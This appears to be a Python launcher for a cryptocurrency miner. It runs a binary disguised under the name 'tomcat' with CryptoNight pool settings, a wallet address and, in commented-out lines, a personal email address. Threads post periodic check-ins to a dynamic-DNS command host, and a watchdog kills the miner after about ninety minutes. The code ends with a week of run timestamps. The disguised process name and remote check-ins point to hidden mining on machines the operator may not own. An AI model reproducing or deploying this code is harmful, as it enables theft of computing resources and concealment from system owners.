import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:01.973419
#2018-02-17 17:18:07.083892
#2018-02-17 19:06:07.665712
#2018-02-17 20:56:05.250251
#2018-02-17 22:42:05.415379
#2018-02-18 00:26:07.295483
#2018-02-18 02:17:01.520277
#2018-02-18 04:04:05.922753
#2018-02-18 05:55:06.300603
#2018-02-18 07:47:04.154668
#2018-02-18 09:35:01.341402
#2018-02-18 11:21:06.328984
#2018-02-18 13:07:06.662227
#2018-02-18 14:56:04.015068
#2018-02-18 16:44:07.649707
#2018-02-18 18:33:05.238581
#2018-02-18 20:21:05.971681
#2018-02-18 22:07:06.455368
#2018-02-18 23:56:06.298088
#2018-02-19 01:42:07.303987
#2018-02-19 03:30:06.942784
#2018-02-19 05:14:01.595084
#2018-02-19 06:59:05.747477
#2018-02-19 08:47:07.314570
#2018-02-19 10:36:07.853046
#2018-02-19 12:23:06.982745
#2018-02-19 14:09:01.477231
#2018-02-19 15:59:07.091393
#2018-02-19 17:47:10.737205
#2018-02-19 19:35:09.415167
#2018-02-19 21:22:06.183527
#2018-02-19 23:08:01.856369
#2018-02-20 00:53:05.030522
#2018-02-20 02:42:06.884618
#2018-02-20 04:30:08.253833
#2018-02-20 06:15:02.334905
#2018-02-20 08:00:06.070424
#2018-02-20 09:46:08.832985
#2018-02-20 11:30:11.069719
#2018-02-20 13:18:06.283737
#2018-02-20 15:03:09.113991
#2018-02-20 16:48:01.915794
#2018-02-20 18:36:10.643075
#2018-02-20 20:28:04.036770
#2018-02-20 22:12:04.201206
#2018-02-20 23:55:07.765893
#2018-02-21 01:40:08.350836
#2018-02-21 03:28:07.149424
#2018-02-21 05:16:05.726054
#2018-02-21 07:06:01.214731
#2018-02-21 08:51:06.969286
#2018-02-21 10:39:02.164460
#2018-02-21 12:26:08.077814
#2018-02-21 14:13:07.589280
#2018-02-21 15:59:04.277828
#2018-02-21 17:51:07.691518
#2018-02-21 19:36:08.232511
#2018-02-21 21:23:04.427761
#2018-02-21 23:09:03.670871
#2018-02-22 00:57:04.243927
#2018-02-22 02:44:07.603942
#2018-02-22 04:31:01.759194
#2018-02-22 06:16:05.551988
#2018-02-22 08:02:01.955525
#2018-02-22 09:50:05.553238
#2018-02-22 11:35:07.948402
#2018-02-22 13:22:04.347815
#2018-02-22 15:09:08.528146
#2018-02-22 16:54:08.065040
#2018-02-22 18:42:06.379960
#2018-02-22 20:33:07.047656
#2018-02-22 22:18:01.468066
#2018-02-23 00:06:08.543682
#2018-02-23 01:55:01.348988
#2018-02-23 03:47:07.288057
#2018-02-23 05:39:01.703984
#2018-02-23 07:23:07.680091
#2018-02-23 09:28:02.141482
#2018-02-23 11:34:04.995219
#2018-02-23 13:24:04.160841
#2018-02-23 15:09:08.869160
#2018-02-23 16:58:09.170827
#2018-02-23 19:06:07.943502
#2018-02-23 20:51:08.072073
#2018-02-23 22:40:03.108256
#2018-02-24 00:28:05.729710
#2018-02-24 02:20:06.644818
#2018-02-24 04:09:02.075403
#2018-02-24 05:57:07.347060
#2018-02-24 07:46:01.599805
#2018-02-24 09:30:04.152806
#2018-02-24 11:23:06.662108
#2018-02-24 13:12:02.227164
#2018-02-24 15:01:06.835719
#2018-02-24 16:51:06.386885
#2018-02-24 18:39:03.687625
#2018-02-24 20:30:08.998105
#2018-02-24 22:28:01.975673
#2018-02-25 01:38:04.885554
#2018-02-25 05:06:06.465148
#2018-02-25 10:17:01.342307